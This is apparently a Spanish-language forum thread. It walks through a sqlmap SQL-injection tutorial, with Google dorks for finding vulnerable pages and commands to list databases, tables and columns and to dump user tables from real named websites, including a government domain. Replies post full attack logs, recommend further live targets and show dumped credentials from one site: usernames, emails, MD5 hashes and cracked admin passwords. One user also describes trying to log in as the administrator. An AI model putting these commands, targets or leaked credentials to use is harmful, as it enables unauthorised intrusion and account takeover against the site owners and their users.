cd /pentest/database/sqlmap/
allinurl: /news.php?id=allinurl: /article.php?id=allinurl: /noticia.php?id=
http://www.sitioweb.com/news.php?id=543'
./sqlmap.py -u http://www.sitio-web.com/news.php?id=543 --dbs
available databases [2]: information_schema connectdb
./sqlmap.py -u http://www.sitio-web.com/news.php?id=543 -D aquívaladb --tables
Database: connectdb[20 tables]+-------------------+| connect_cargos || connect_ciudades || connect_contacto || connect_contenido || connect_contratista || connect_documentos || connect_ds || connect_empleo || connect_enlaces || connect_errores || connect_estados || connect_extras || connect_log || connect_media || connect_rextras || connect_rsecciones || connect_rtagcloud || connect_secciones || connect_tagcloud || connect_usuarios |+-------------------+
./sqlmap.py -u http://www.sitio-web.com/news.php?id=543 -D aquívaladb -T aquívalatabladeusuarios --columns
Database: connectdbTable: connect_usuarios[9 columns]+-----------------------+-----------------+| Column | Type |+-----------------------+-----------------+| apellido_usuarios | varchar(45) || clave_usuarios | varchar(40) || email_usuarios | varchar(255) || id_usuarios | int(2) unsigned || institucion_usuarios | varchar(45) || nombre_usuarios | varchar(45) || permisos_usuarios | tinyint(4) || telf_usuarios | int(11) || ultimoacceso_usuarios | datetime |+-----------------------+-----------------+
./sqlmap.py -u http://www.sitio-web.com/news.php?id=543 -D aquívaladb -T aquívalatabladeusuarios --dump
./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 -D aquivaladb -T aquívalatabladeusuarios -C "clave_usuarios,email_usuarios,id_usuarios,nombre_usuarios" --dump
Database: connectdbTable: connect_usuarios[3 entries]+-------------------+----------------------------+-----------------+---------------+| clave_usuarios | email_usuarios | id_usuarios | nombre_usuarios |+-------------------+----------------------------+-----------------+---------------+| Olivo | [email protected] | 1 | | ernesto || Gimenez | [email protected] | 4 | | lugimenez || Gonzalez Aviles | [email protected] | 11 | | gonzal |+-------------------+----------------------------+-----------------+---------------+
excelente tutorial, pero mira en el primer paso y ya tuve un problema, la pagina es vulnerable, esto es lo que hice sabes que pasa? Spoilerroot@bt:/pentest/database/sqlmap# ./sqlmap.py -u www.cideko.com/pro_con.php?id=3 --dbs sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program starting at 09:25:14[09:25:14] [INFO] resuming back-end DBMS 'mysql'[09:25:15] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=3 AND 8196=8196--- [09:25:16] [INFO] the back-end DBMS is MySQL web application technology: PHP 4.4.9, Apacheback-end DBMS: MySQL 3[09:25:16] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database[09:25:16] [INFO] fetching number of databases[09:25:17] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[09:25:17] [INFO] retrieved:[09:25:17] [INFO] heuristics detected web page charset 'ascii' [09:25:19] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'[09:25:19] [ERROR] unable to retrieve the number of databases[09:25:19] [INFO] falling back to current database[09:25:19] [INFO] fetching current database[09:25:19] [INFO] retrieved:[09:25:23] [CRITICAL] unable to retrieve the database names shutting down at 09:25:23 root@bt:/pentest/database/sqlmap#
Cita de: noopynoob en Noviembre 18, 2013, 03:34:40 pmexcelente tutorial, pero mira en el primer paso y ya tuve un problema, la pagina es vulnerable, esto es lo que hice sabes que pasa? Spoilerroot@bt:/pentest/database/sqlmap# ./sqlmap.py -u www.cideko.com/pro_con.php?id=3 --dbs sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program starting at 09:25:14[09:25:14] [INFO] resuming back-end DBMS 'mysql'[09:25:15] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=3 AND 8196=8196--- [09:25:16] [INFO] the back-end DBMS is MySQL web application technology: PHP 4.4.9, Apacheback-end DBMS: MySQL 3[09:25:16] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database[09:25:16] [INFO] fetching number of databases[09:25:17] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[09:25:17] [INFO] retrieved:[09:25:17] [INFO] heuristics detected web page charset 'ascii' [09:25:19] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'[09:25:19] [ERROR] unable to retrieve the number of databases[09:25:19] [INFO] falling back to current database[09:25:19] [INFO] fetching current database[09:25:19] [INFO] retrieved:[09:25:23] [CRITICAL] unable to retrieve the database names shutting down at 09:25:23 root@bt:/pentest/database/sqlmap#Hola nopynob, la verdad, no sé cual es el error, pero por lo poco que e podido leer seguramente sea o que tu sqlmap no está bien configurado y/o instalado, o que esa página web tira un error, por favor prueba con otra web por ejemplo con: "www.calidus.ro/en/news.php?id=2" sí te salen más errores por favor dímelos...Saludos, Jeremy López.
root@bt:~# cd /pentest/database/sqlmaproot@bt:/pentest/database/sqlmap# ./sqlmap.py -u www.cideko.com/pro_con.php?id=3 --dbs sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program starting at 21:00:46[21:00:47] [INFO] testing connection to the target url[21:00:49] [INFO] testing if the url is stable, wait a few seconds[21:00:51] [INFO] url is stable[21:00:51] [INFO] testing if GET parameter 'id' is dynamic[21:00:52] [INFO] confirming that GET parameter 'id' is dynamic[21:00:54] [WARNING] GET parameter 'id' appears to be not dynamic[21:00:54] [INFO] testing for SQL injection on GET parameter 'id'[21:00:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[21:00:54] [INFO] heuristics detected web page charset 'ascii'[21:00:54] [WARNING] reflective value(s) found and filtering out[21:00:59] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [21:00:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[21:00:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[21:01:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[21:01:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[21:01:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'[21:01:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[21:01:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[21:01:04] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[21:01:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'[21:01:05] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[21:01:06] [INFO] testing 'Oracle AND time-based blind'[21:01:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[21:01:07] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found[21:01:09] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[21:01:18] [INFO] target url appears to have 36 columns in queryinjection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y[21:11:48] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. --dbms=mysql) [21:11:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[21:11:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using the --dbms optioninjection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y[21:19:42] [INFO] checking if the injection point on GET parameter 'id' is a false positiveGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ysqlmap identified the following injection points with a total of 318 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=3 AND 6607=6607---[21:35:13] [INFO] testing MySQL[21:35:14] [INFO] confirming MySQL[21:35:18] [INFO] the back-end DBMS is MySQLweb application technology: PHP 4.4.9, Apacheback-end DBMS: MySQL < 4.0.0[21:35:18] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database[21:35:18] [INFO] fetching number of databases[21:35:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[21:35:18] [INFO] retrieved: [21:35:20] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'[21:35:20] [ERROR] unable to retrieve the number of databases[21:35:20] [INFO] falling back to current database[21:35:20] [INFO] fetching current database[21:35:20] [INFO] retrieved: [21:35:25] [CRITICAL] unable to retrieve the database names shutting down at 21:35:25root@bt:/pentest/database/sqlmap#
Saludos! intente con la pagina que me dijiste y efectivamente funciona! gracias por eso mira:Spoileravailable databases [1]: information_schema calidus_calidussql Database: calidus_calidussql[50 tables]+------------------+| about ||about_de ||about_en ||categories ||categories_de ||categories_en ||contact ||contact_de ||contact_en ||customers ||eco ||eco_de ||eco_en ||faq ||faq_de ||faq_en ||forum_answer ||forum_question ||galleries ||gallery ||gallery_de ||gallery_en ||gallery_images ||imp ||mission ||mission_de ||mission_en ||news ||news_de ||news_en ||pellets ||pellets_de ||pellets_en ||prices ||products ||products_de ||products_en ||projects ||projects_de ||projects_en ||special_offers ||special_offers_de ||special_offers_en ||support ||support_de ||support_en ||users ||vizion ||vizion_de ||vizion_en |+------------------+ Database: calidus_calidussqlTable: users[2 columns]+-----------+-------------+| Column | Type |+---------------+-------------+| username | int(11) || user_password | varchar(20) |+---------------+-------------+ Database: calidus_calidussqlTable: users[3 entries]+-----------------------+| user_name |+-----------------------+| 1) admin <- [ADMIN] || 2) miladro <- [USER] || 3) dexmod <- [ADMIN] |+-----------------------+ Database: calidus_calidussqlTable: users[3 entries]+---------------+| user_password |+---------------+| 1) root || 2) marjan || 3) DexmoD |+---------------+mi log:Spoilerroot@bt:~# cd ../pentest/database/sqlmaproot@bt:/pentest/database/sqlmap# ./sqlmap.py -u www.calidus.ro/en/news.php?id=2 -D calidus_calidussql -T users -C "user_email,user_id,username,user_password" --dump sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program starting at 08:59:49[08:59:50] [INFO] resuming back-end DBMS 'mysql'[09:00:10] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2 AND 4448=4448 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=2 AND (SELECT 8489 FROM(SELECT COUNT(*),CONCAT(0x3a68717a3a,(SELECT (CASE WHEN (8489=8489) THEN 1 ELSE 0 END)),0x3a6c6c733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: id=2 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a68717a3a,0x696a6b474d444c775164,0x3a6c6c733a)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=2 AND SLEEP(5)--- [09:00:31] [INFO] the back-end DBMS is MySQL web application technology: Apache, PHP 5.4.20back-end DBMS: MySQL 5.0do you want sqlmap to consider provided column(s):[1] as LIKE column names (default)[2] as exact column names> 2 [09:00:41] [INFO] fetching columns 'user_email, user_id, user_password, username' for table 'users' in database 'calidus_calidussql'[09:00:42] [WARNING] reflective value(s) found and filtering out[09:00:42] [INFO] fetching entries of column(s) 'user_email, user_id, user_password, username' for table 'users' in database 'calidus_calidussql'[09:00:43] [INFO] analyzing table dump for possible password hashesrecognized possible password hashes in column 'user_password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] Y [09:00:48] [INFO] using hash method 'md5_generic_passwd'[09:00:48] [INFO] resuming password 'root' for hash '63a9f0ea7bb98050796b649e85481845' for user 'admin'[09:00:48] [INFO] resuming password 'marjan' for hash '122f961db675f6a45b998594471a990b' for user 'miladro'what dictionary do you want to use?[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)[2] custom dictionary file[3] file with list of dictionary files> 1 [09:00:52] [INFO] using default dictionary[09:00:52] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'do you want to use common password suffixes? (slow!) [y/N] y [09:00:56] [INFO] starting dictionary-based cracking (md5_generic_passwd)[09:02:13] [INFO] using suffix '1' [09:02:32] [INFO] current status: a910u... |^C[09:02:32] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)[09:02:32] [INFO] writing uncracked hashes to file '/tmp/tmpdPz1cV.txt' for eventual further processing[09:02:32] [INFO] postprocessing table dumpDatabase: calidus_calidussqlTable: users[3 entries]+---------+----------+-------------------------------------+-------------------------------------------+| user_id | username | user_email | user_password |+---------+----------+-------------------------------------+-------------------------------------------+| 1 | dexmod | [email protected] | a0dbde9503e13437db0f854b0b72a73b || 8 | admin | <blank> | 63a9f0ea7bb98050796b649e85481845 (root) || 6 | miladro | [email protected] | 122f961db675f6a45b998594471a990b (marjan) |+---------+----------+-------------------------------------+-------------------------------------------+ [09:02:32] [INFO] table 'calidus_calidussql.users' dumped to CSV file '/pentest/database/sqlmap/output/www.calidus.ro/dump/calidus_calidussql/users.csv'[09:02:33] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.calidus.ro' shutting down at 09:02:32 root@bt:/pentest/database/sqlmap#esta claro el username y password de los administradores, pero cuando intento logearme como tal mira:no quiero hacer nada malicioso solo quiero saber el porque ocurre esto, mira aqui hay otra pagina web vulnerable pero el problema es cuando volcaba la base de datos salieron como 1000 tablas y estoy perdidohttp://www.futuresfins.com/fin-detail.php?id=173gracias